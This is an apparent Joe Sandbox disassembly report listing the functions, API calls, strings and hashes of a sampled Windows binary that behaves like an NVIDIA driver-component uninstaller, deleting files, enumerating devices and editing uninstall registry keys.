                                  • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                  • API String ID: 2125014093-3819984048
                                  • Opcode ID: c6933f4373af68cde0690791b5f333da47ece339dd8c8f53ed1e631e6ddfe54f
                                  • Instruction ID: 8a8bda549739b6fb46912d7fa0b1f0d9274e4200d8d5a19a325c21dce875d23a
                                  • Opcode Fuzzy Hash: c6933f4373af68cde0690791b5f333da47ece339dd8c8f53ed1e631e6ddfe54f
                                  • Instruction Fuzzy Hash: 65319231A80311ABC7317F76AC096173AA1EB44354B96453FE810E32F0DBB998638B9D
                                  Function 00402A10 Relevance: 29.8, APIs: 7, Strings: 10, Instructions: 100filesleepCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetFileAttributesA.KERNEL32(?), ref: 00402A2C
                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 00402A6C
                                  • DeleteFileA.KERNEL32(?), ref: 00402A79
                                  • GetLastError.KERNEL32 ref: 00402A89
                                  • Sleep.KERNEL32(000003E8), ref: 00402AC5
                                  • DeleteFileA.KERNEL32(?), ref: 00402AC8
                                  • GetLastError.KERNEL32 ref: 00402B04
                                  Strings
                                  • nPollTimeoutCount = %d, xrefs: 00402AA8
                                  • CommandClass::RunOnce, xrefs: 00402A13
                                  • NVU file [%s] couldn't be deleted due to Sharing Violation., xrefs: 00402A91
                                  • Deleting NVU file [%s], xrefs: 00402A59
                                  • Deletion of NVU File [%s] failed after %d seconds., xrefs: 00402AD0
                                  • We'll wait [%s] to be freed and get deleted for max. 10 secs., xrefs: 00402A9C
                                  • NVU File [%s] deleted after polling for %d seconds., xrefs: 00402AEE
                                  • Failed to delete NVU file [%s] with error [%d], xrefs: 00402B08
                                  • LeaveBinaries, xrefs: 00402A44
                                  • Leaving NVU file [%s], xrefs: 00402B1E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: File$AttributesDeleteErrorLastTime_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleSleepStringWait_fprintf
                                  • String ID: CommandClass::RunOnce$Deleting NVU file [%s]$Deletion of NVU File [%s] failed after %d seconds.$Failed to delete NVU file [%s] with error [%d]$LeaveBinaries$Leaving NVU file [%s]$NVU File [%s] deleted after polling for %d seconds.$NVU file [%s] couldn't be deleted due to Sharing Violation.$We'll wait [%s] to be freed and get deleted for max. 10 secs.$nPollTimeoutCount = %d
                                  • API String ID: 4234528627-1706409573
                                  • Opcode ID: 4a14d0bc809e176fd4c0a097a6e86a6b18c7b649eaf900e500a4875d8e93c26b
                                  • Instruction ID: c0a542e3d7c0238f7b7a203dda44ef3d1633081303fe9afb9b043d559c39436f
                                  • Opcode Fuzzy Hash: 4a14d0bc809e176fd4c0a097a6e86a6b18c7b649eaf900e500a4875d8e93c26b
                                  • Instruction Fuzzy Hash: B321B63274131466D2206AB6BD46E9F3B0DCFA636AB104137F505B11C2EA7D5D5441FE
                                  Function 004080A0 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 152memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00408103
                                  • GetFileVersionInfoSizeA.VERSION(?,?), ref: 0040810F
                                  • GlobalAlloc.KERNEL32(00000042,00000000,?,?), ref: 0040811D
                                  • GlobalLock.KERNEL32(00000000), ref: 0040812A
                                  • GetFileVersionInfoA.VERSION(?,00000000,00000000,00000000), ref: 00408137
                                  • VerQueryValueA.VERSION(00000000,0041CD3C,?,?,?,00000000,00000000,00000000), ref: 00408150
                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040817E
                                  • GlobalFree.KERNEL32(00000000), ref: 00408185
                                  • GetFileVersionInfoSizeA.VERSION(?,?,?,?), ref: 00408197
                                  • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?), ref: 004081A5
                                  • GlobalLock.KERNEL32(00000000), ref: 004081B2
                                  • GetFileVersionInfoA.VERSION(?,00000000,00000000,00000000), ref: 004081BF
                                  • VerQueryValueA.VERSION(00000000,0041CD3C,?,?,?,00000000,00000000,00000000), ref: 004081D8
                                  • GlobalUnlock.KERNEL32(00000000), ref: 00408206
                                  • GlobalFree.KERNEL32(00000000), ref: 0040820D
                                  Strings
                                  • UninstCommandClass::IsGreater, xrefs: 004080C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Global$FileInfoVersion$AllocFreeLockQuerySizeTimeUnlockValue_fputs$DebugDirectoryFormatLocalMutexObjectOutputReleaseSingleStringSystemWait_fprintf
                                  • String ID: UninstCommandClass::IsGreater
                                  • API String ID: 1794461906-226021759
                                  • Opcode ID: 39267b06595b4439bbc571028a1487db6a4c50f3e5ce7f24655965f3bfa52e4b
                                  • Instruction ID: 99336b5770b64915b0aca5243ee5e341e913464649659e78337c6ad6bd4687bc
                                  • Opcode Fuzzy Hash: 39267b06595b4439bbc571028a1487db6a4c50f3e5ce7f24655965f3bfa52e4b
                                  • Instruction Fuzzy Hash: 1A516171508341AFC310DF55D9859ABBBE8FF88740F40493EF989A6392D738D944CB9A
                                  Function 00408FF0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 171COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SetupDiGetINFClassA.SETUPAPI ref: 0040906D
                                  • SetupDiCreateDeviceInfoList.SETUPAPI(00000000,?), ref: 0040907C
                                  • SetupDiCreateDeviceInfoA.SETUPAPI(00000000,unknown,?,00000000,?,00000001,?), ref: 004090C5
                                  • _memset.LIBCMT ref: 004090D7
                                  • _sprintf.LIBCMT ref: 004090EA
                                  • SetupDiSetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000001,?,00000050), ref: 00409104
                                  • SetupDiRegisterDeviceInfo.SETUPAPI(00000000,?,00000000,00000000,00000000,00000000), ref: 00409118
                                  • _memset.LIBCMT ref: 0040912A
                                  • SetupDiSetDeviceInstallParamsA.SETUPAPI(00000000,?,00000128), ref: 00409167
                                  • SetupDiBuildDriverInfoList.SETUPAPI(00000000,?,00000002), ref: 00409175
                                  • _memset.LIBCMT ref: 0040918A
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  • UninstCommandClass::CreateDevice, xrefs: 0040900D
                                  • CreateDevice: invalid number of arguments, xrefs: 0040902F
                                  • unknown, xrefs: 004090B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Setup$Device$Info$_memset$CreateListTime_fputs_sprintf$BuildClassDebugDriverFormatInstallLocalMutexObjectOutputParamsPropertyRegisterRegistryReleaseSingleStringWait_fprintf
                                  • String ID: CreateDevice: invalid number of arguments$UninstCommandClass::CreateDevice$unknown
                                  • API String ID: 322256318-1358285150
                                  • Opcode ID: a94018fb6d579b354e042ddc503bacd10e53d4d1b5c43911dab66da51df4e2a5
                                  • Instruction ID: bc030977ca2bf9d72af5533a418d091b41b8f714fd2c17edf9647ced41cd9f81
                                  • Opcode Fuzzy Hash: a94018fb6d579b354e042ddc503bacd10e53d4d1b5c43911dab66da51df4e2a5
                                  • Instruction Fuzzy Hash: 9E5120B1244340BFE320DB50DC4AFEF77A8EF89704F40492DF249961C1DBB465098BAA
                                  Function 00406100 Relevance: 24.8, APIs: 8, Strings: 6, Instructions: 261COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SetupDiClassGuidsFromNameA.SETUPAPI(?,00000000,?,?), ref: 004061C5
                                  • SetupDiClassGuidsFromNameA.SETUPAPI(?,00000000,?,?), ref: 004061F4
                                  • SetupDiGetClassDevsA.SETUPAPI ref: 00406231
                                  • SetupDiEnumDeviceInfo.SETUPAPI(00000000,?,00000001), ref: 00406299
                                  • _memset.LIBCMT ref: 004062B3
                                  • SetupDiGetDeviceInstanceIdA.SETUPAPI(00000000,?,?,00000400,00000000), ref: 004062CD
                                  • SetupDiDestroyDeviceInfoList.SETUPAPI(00000000), ref: 00406429
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Setup$ClassDevice$FromGuidsInfoNameTime_fputs$DebugDestroyDevsEnumFormatInstanceListLocalMutexObjectOutputReleaseSingleStringWait_fprintf_memset
                                  • String ID: DUMMY_INSTANCEID$Enum device was called with NULL function$Error$Skipping RemoveDevice on device:%s$UninstCommandClass::NvEnumDevices$any
                                  • API String ID: 363311733-3188088973
                                  • Opcode ID: 2d8af07a2f569a92dcff229592d3b7983184fe2904406c3f18282a6e3682ae03
                                  • Instruction ID: a57d1feb82a64fe5c013b1d84f289ad278b752fbb9c94777bd69b5d2824c3678
                                  • Opcode Fuzzy Hash: 2d8af07a2f569a92dcff229592d3b7983184fe2904406c3f18282a6e3682ae03
                                  • Instruction Fuzzy Hash: AA91A2B19083005FD710DF29C841B6BB7E8EBC9304F05493EF986A7291E779D954CBAA
                                  Function 00407090 Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 82COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                    • Part of subcall function 00403B20: WaitForSingleObject.KERNEL32(?,000000FF,004025D7), ref: 00403B31
                                    • Part of subcall function 00403B20: ReleaseMutex.KERNEL32(?), ref: 00403B47
                                  • _sprintf.LIBCMT ref: 004070CE
                                  • _sprintf.LIBCMT ref: 00407128
                                  • _sprintf.LIBCMT ref: 0040716D
                                  Strings
                                  • Removing uninstall component title from registry, xrefs: 00407158
                                  • Component uninstalled, xrefs: 00407181
                                  • Executing command %s, xrefs: 00407138
                                  • RunOnce {sysdir}\%s, xrefs: 0040711B
                                  • Clearing uninstall component title from registry, xrefs: 004070F4
                                  • Getreg Uninstall Title={NVCompList_RegKey}\%s, xrefs: 004070C8
                                  • Setreg {NVCompList_RegKey}\{Current Reg Name}={UNINSTALL_TAG}, xrefs: 0040710E
                                  • Delreg {NVCompList_RegKey}\%s, xrefs: 00407167
                                  • Current Reg Name, xrefs: 00407102
                                  • Uninstalling component %s, xrefs: 004070AF
                                  • Uninstall {sysdir}\%s,{Uninstall Title}, xrefs: 004071AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: _sprintf$MutexObjectReleaseSingleTimeWait_fputs$DebugFormatLocalOutputString_fprintf
                                  • String ID: Clearing uninstall component title from registry$Component uninstalled$Current Reg Name$Delreg {NVCompList_RegKey}\%s$Executing command %s$Getreg Uninstall Title={NVCompList_RegKey}\%s$Removing uninstall component title from registry$RunOnce {sysdir}\%s$Setreg {NVCompList_RegKey}\{Current Reg Name}={UNINSTALL_TAG}$Uninstall {sysdir}\%s,{Uninstall Title}$Uninstalling component %s
                                  • API String ID: 1613415582-2277294574
                                  • Opcode ID: 68a7d2de12f80199d49320735d0b63897df41a32a7ccac08fffaec95443d8dee
                                  • Instruction ID: c6f617dc216f05a48fa0ba580e3fb22fe50b4373394c1d2a431079b53d0eccfa
                                  • Opcode Fuzzy Hash: 68a7d2de12f80199d49320735d0b63897df41a32a7ccac08fffaec95443d8dee
                                  • Instruction Fuzzy Hash: 8521D3B5A44200B6C120B7A29C52FEF769D9FA1708F44453FB988621C2FA7C654983EF
                                  Function 00404630 Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 168COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • NvRemoveString: invalid number of arguments!, xrefs: 004047FD
                                  • NvRemoveString: invalid number of arguments!, xrefs: 004047F3
                                  • NvRemoveString: Seperating string not found ("-"), xrefs: 004046A3
                                  • (-), xrefs: 00404690
                                  • NvRemoveString: Original string is missing!, xrefs: 00404700
                                  • NvRemoveString: Seperating string not found!, xrefs: 004046AD
                                  • NULL, xrefs: 00404656
                                  • NvRemoveString: Original string is missing! (nCpyLen=%d), xrefs: 004046F6
                                  • NvRemoveString: Both the original and removal string are the same!, xrefs: 00404771
                                  • UninstCommandClass::NvRemoveString(%s), xrefs: 0040465C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: _memset
                                  • String ID: (-)$NULL$NvRemoveString: Both the original and removal string are the same!$NvRemoveString: Original string is missing!$NvRemoveString: Original string is missing! (nCpyLen=%d)$NvRemoveString: Seperating string not found ("-")$NvRemoveString: Seperating string not found!$NvRemoveString: invalid number of arguments!$NvRemoveString: invalid number of arguments!$UninstCommandClass::NvRemoveString(%s)
                                  • API String ID: 2102423945-3212761688
                                  • Opcode ID: f347cdfc1e6805acec5583669ea69c1633b23ddf6944060d8fc4f639ffd391a7
                                  • Instruction ID: 30d08693506db3ec00ee17d6b6c93bb3bde48163a97bdcea72654f498ab7bc7e
                                  • Opcode Fuzzy Hash: f347cdfc1e6805acec5583669ea69c1633b23ddf6944060d8fc4f639ffd391a7
                                  • Instruction Fuzzy Hash: F9513A7264430057C210BF399C52BAB779D9FD2708F14493FF946B72C2EA7D990882AE
                                  Function 0041A422 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 164libraryloaderCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,0042B2C0,004139FD,0042B2C0,Microsoft Visual C++ Runtime Library,00012010), ref: 0041A44F
                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0041A46B
                                    • Part of subcall function 0040ED01: TlsGetValue.KERNEL32(00000000,0040ED76,00000000,0041A430,00000000,00000000,00000314,?,?,?,0042B2C0,004139FD,0042B2C0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040ED0E
                                    • Part of subcall function 0040ED01: TlsGetValue.KERNEL32(00000006,?,?,?,0042B2C0,004139FD,0042B2C0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040ED25
                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041A488
                                    • Part of subcall function 0040ED01: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0042B2C0,004139FD,0042B2C0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040ED3A
                                    • Part of subcall function 0040ED01: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040ED55
                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041A49D
                                  • __invoke_watson.LIBCMT ref: 0041A4BE
                                    • Part of subcall function 0040F338: _memset.LIBCMT ref: 0040F3C4
                                    • Part of subcall function 0040F338: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 0040F3E2
                                    • Part of subcall function 0040F338: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 0040F3EC
                                    • Part of subcall function 0040F338: UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 0040F3F6
                                    • Part of subcall function 0040F338: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 0040F411
                                    • Part of subcall function 0040F338: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 0040F418
                                    • Part of subcall function 0040ED78: TlsGetValue.KERNEL32(00000000,0040EE0D,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040ED85
                                    • Part of subcall function 0040ED78: TlsGetValue.KERNEL32(00000006,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040ED9C
                                    • Part of subcall function 0040ED78: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040EDB1
                                    • Part of subcall function 0040ED78: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0040EDCC
                                  • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 0041A4D2
                                  • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0041A4EA
                                  • __invoke_watson.LIBCMT ref: 0041A55D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
